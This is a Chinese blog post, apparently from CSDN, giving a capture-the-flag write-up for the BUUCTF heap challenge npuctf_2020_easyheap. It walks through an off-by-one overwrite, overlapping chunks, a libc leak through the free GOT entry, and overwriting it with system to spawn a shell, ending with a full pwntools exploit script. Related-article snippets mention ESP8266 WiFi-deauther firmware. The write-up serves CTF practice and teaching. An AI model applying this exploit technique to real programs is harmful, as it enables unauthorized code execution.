[BUUCTF]PWN——npuctf_2020_easyheap

最新推荐文章于 2024-03-12 21:30:23 发布
最新推荐文章于 2024-03-12 21:30:23 发布
阅读量732 收藏 4
点赞数 4
分类专栏: BUUCTF刷题记录 PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcmuyanga/article/details/112851757
版权

npuctf_2020_easyheap

附件

步骤:

  1. 例行检查,64位程序,开启了canary和nx
    在这里插入图片描述
  2. 本地试运行一下,看看大概的情况,经典的堆题的菜单
    在这里插入图片描述
  3. 64位ida载入
    add()
    在这里插入图片描述
    edit()在这里插入图片描述
    show()
    在这里插入图片描述
    delete()
    在这里插入图片描述

利用思路

  1. 通过 off by one 漏洞,修改下一个 chunk 的 size 为 0x41 大小,这样 free 之后就能造成堆块重叠。
  2. 通过堆块重叠,修改记录 size 与 chunk_addr 的 chunk 中的 chunk_addr 为 free函数的 got 表地址,然后通过show打印泄露libc
  3. 获取libc后就能计算出system的地址,再次通过off-by-one修改free@got为 system 的地址,当主函数再次执行delete(chunk2)的时候,结合 “/bin/sh” 参数,实现 system(’/bin/sh’) 获取shell

利用过程

  1. 构造堆块重叠
    创建堆块
add(0x18,'aaaa')
add(0x18,'bbbb')
add(0x18,'/bin/sh\x00')

此时堆的布局
在这里插入图片描述
利用off-by-one,通过修改chunk0来修改chunk1的size,这样释放chunk1的话就会构成重叠堆

edit(0,'a'*0x18+'\x41')
delete(1)

此时的堆布局
在这里插入图片描述

  1. 构造好重叠堆块后,通过编辑new_chunk_1来将记录chunk2地址的地方改为free@got,然后通过show来泄露libc,有了libc就可以计算system函数的地址了
payload='a'*0x10+p64(0)+p64(0x21)+p64(0x100)+p64(elf.got['free'])
add(0x38,payload)
show(1)

p.recvuntil('Content : ')
libcbase=u64(p.recvuntil('\x7f').ljust(8,'\x00'))-libc.symbols['free']
system_addr=libcbase+libc.symbols['system']

此后的堆布局,已经将chunk1_addr改成了free@got的地址
在这里插入图片描述

  1. 最后修改free@got的地址为system的地址,然后执行delete(chunk2),从而执行了system(‘/bin/sh’),获取了shell
edit(1,p64(system_addr))
delete(2)
p.interactive()

成功将free@got地址改成了system地址
在这里插入图片描述

完整exp:

from pwn import * 

p=process('./npuctf_2020_easyheap')
#p=remote('node3.buuoj.cn',28132)

elf=ELF('./npuctf_2020_easyheap')
context.log_level="debug"
libc=ELF('./libc-2.27-64.so')

def add(size,content):
	p.sendlineafter('Your choice :',str(1))
	p.sendlineafter('Size of Heap(0x10 or 0x20 only) : ',str(size))
	p.sendlineafter('Content:',content)

def edit(index,content):
	p.sendlineafter('Your choice :',str(2))
	p.sendlineafter('Index :',str(index))
	p.recvuntil("Content: ")
	p.send(content)

def show(idx):
	p.sendlineafter('Your choice :',str(3))
	p.sendlineafter('Index :',str(idx))

def delete(idx):
	p.sendlineafter('Your choice :',str(4))
	p.sendlineafter('Index :',str(idx))

add(0x18,'aaaa')
add(0x18,'bbbb')
add(0x18,'/bin/sh\x00')

edit(0,'a'*0x18+'\x41')
delete(1)

payload='a'*0x10+p64(0)+p64(0x21)+p64(0x100)+p64(elf.got['free'])
add(0x38,payload)
#gdb.attach(p)
show(1)

p.recvuntil('Content : ')
libcbase=u64(p.recvuntil('\x7f').ljust(8,'\x00'))-libc.symbols['free']
system_addr=libcbase+libc.symbols['system']

edit(1,p64(system_addr))
#gdb.attach(p)
delete(2)
p.interactive()

在这里插入图片描述

Angel~Yan
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PWN.rar_PWN
09-24
本代码是在Keil uVision3环境下使用c语言编写的。功能是使用片内pgaPWN输出占空比可变的方波。
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
AVR系列单片机Mage8PWM脉冲输出程序
new-easypwn)
最新发布
m0_72827793的博客
03-12 1186
由于栈溢出攻击的主要目标通过溢出覆盖函数栈高位的返回地址,因此其思路是在函数开始执行前,即在返回地地址前写入一个字长的随机数据,在函数返回前校验该值是否被改变,如果被改变,则认为是发生了栈溢出。与ASLR保护十分类似,PIE保护的目的是让可执行程序ELF的地址进行随机化加载,从而使得程序的内存结构对攻击者完全未知,进一步提高程序的安全性。ASLR的目的是将程序的堆栈地址和动态链接库的加载地址进行一定的随机化,这些地址之间是不可读写执行的为映射内存,降低攻击者对程序内存结构的了解。
PWN.rar_pulse verilog_pulse width_verilog hdl
09-20
Pulse Width modulation using Verilog HDL
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
npuctf_2020_easyheap
qq_51687381的博客
07-27 257
这题的结构,像是hacknote 和之前一个easyheap的融合。 但是漏洞利用手法不太一样。之前的一个easyheap是利用fastbin里面的一种漏洞。伪造一个fake chunk。(这道题的原因是因为,就算伪造了一个fake chunk ,我们malloc时也无法利用它) 这次的漏洞:是将control chunk 和content chunk 对调,然后对control chunk攻击。 from pwn import * elf = ELF("./npuctf_2020_easyhea
npuctf_2020_easyheap详解
像初雪一样自由洒落
04-25 794
off by one的题,,, 参考视频:off by one + 改got表的heap做法 例题:npuctf_2020_easyheap 程序流程 create: 申请两个chunk: 一个heaparray[i](固定0x10大小),一个是申请的大小(只能申请0x18或0x38) edit: read_input(heaparray[(signed int)v1][1], *heaparray[(signed int)v1] + 1LL); 存在off by one show:根据id.
NPUCTF pwn
doudoudedi
04-21 744
题目质量很高萌新直接自闭 z这2道题都挺基础的 easy_heap exp: off by one 造成了任意地址写的漏洞 #!/usr/bin/python2 from pwn import * p=0 def pwn(): global p #p=process('./pwn') p=remote('ha1cyon-ctf.fun',30179) elf=ELF('./pwn') l...
攻防世界PWNEasyPwn题解
seaaseesa的博客
11-15 3556
EasyPwn 首先,看一下程序的保护机制 开启了CANARY、NX和PIE,RELRO部分开启,我们可以改写GOT表 然后,我们用IDA分析 read的maxsize参数比变量的空间大小要小,因此无法溢出到栈底,加上开启了PIE,因此排除了ROP的方法 我们再仔细观察一下,发现snprintf在执行的过程中,v2可以溢出到v3,而v3存储的是格式化字符串,因此,我们可以溢出v2...
攻防世界new-easypwn
DeMaJIKA的博客
12-02 195
这儿剋应用pwndbg来看代码,但是个人习惯用ida,先在linux里面运行一下试试功能。反正仙checksec检查下保护机制。
攻防世界-Pwn-new-easypwn
wuh2333的博客
03-12 3600
攻防世界-Pwn-new-easypwn
buuctf easyheap
weixin_44932880的博客
02-09 502
主要知识 堆块的结构,fastbin任意地址构造堆块的检查机制, 对题目流程的认真分析 1.检查文件没有地址偏移的保护 2.查看功能。 3.通过堆的溢出生成一块假堆块 4.假堆块可覆盖heaparray[0]为free的got表的地址. 5.通过更改heaparray[0]存的堆块的内容,将free的got覆盖为system的地址。 6.调用free函数并在前面将参数填充为"/bin/sh\x0...
buuoj刷题记录 - npuctf_2020_easyheap
qq_34010404的博客
03-26 158
题目给了add,show,edit,del函数 问题在edit函数里面,重新编辑的时候可以溢出一个字节 看一下create函数,只能分配大小为 24,和56的空间 思路:覆盖下一个chunk的chunksize低字节达到修改chunk的大小,free 的时候会放到更大的tcache bin里面,之后malloc的时候会造成chunk重叠. 下面是我的构造方法: 把利用 0 把1中chunk2的size 改掉,改成0x40, (一会malloc的时候用到,注意只能分配大小为 56 和 24 的空间,(8.
buuctf [ZJCTF 2019]EasyHeap
weixin_45677731的博客
08-24 898
这题只有add,edit,delete三个主体部分,没有show的部分 create_heap函数,chunk的指针保存在bss段的heaparray数组处 edit_heap函数,注意这里输入的数据长度是可以自己设置的,就可以随意溢出了 delete_heap函数 除此之外,还有这样一个l33t函数: 在程序中,你只要满足一定的条件,是可以运行这个函数的,我猜测在[ZJCTF 2019]比赛进行的时候可能这个函数是可以利用的,但现在在buu上面是用不了的,flag文件的目录不对。不过,这个sys
BUUCTF [ZJCTF 2019]EasyHeap
BengDouLove的博客
04-08 2644
Partial RELRO 那说明got表可写,可以通过改写got表为想要的函数,堆通常的利用方法 还是老样子,一个堆块管理系统,main函数太长了不放了,就是根据你的输入选择操作 值得一提的是有个这个 这个函数能dedaoflag吗??一会再说,反正system是有了,不用泄露libc了 1.create 可以看到,堆块最多有十个,,还是用了一张表维护着堆块的指针,,这样就让人想把这个...
[BUUCTF]PWN——[ZJCTF 2019]EasyHeap
mcmuyanga的博客
12-16 453
[ZJCTF 2019]EasyHeap 附件 步骤: 例行检查,64位程序 试运行一下看看程序大概执行的情况,经典的堆块的菜单 64位ida载入,首先检索字符串,发现了读出flag的函数 看一下每个选项的函数 add 这边size的大小由我们输入控制,heaparray数组在bss段上存放着我们chunk的指针 edit,简单的根据指针修改对应chunk里的值,但是这里的size也是由我们手动输入的,也就是说只要我们这边输入的size比add的时候输入的size大就会造成溢出 delete,释
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP详解主要讲解了如何利用RIP寄存器来进行PWN攻击。RIP寄存器是存储下一条指令的地址,通过控制RIP寄存器的值,可以改变程序的执行流程,从而实现攻击的目的。 PWN攻击是一种利用软件漏洞来获取对计算机系统的控制权的攻击方式。在PWN攻击中,攻击者通常会利用程序中的漏洞,通过输入特定的数据来改变程序的执行流程,从而实现攻击的目的。 BUUCTF PWN-RIP详解文章提供了一些示例和技巧,帮助读者理解和掌握PWN攻击中利用RIP寄存器的方法。如果你对PWN攻击感兴趣,可以阅读该文章以获取更多详细信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值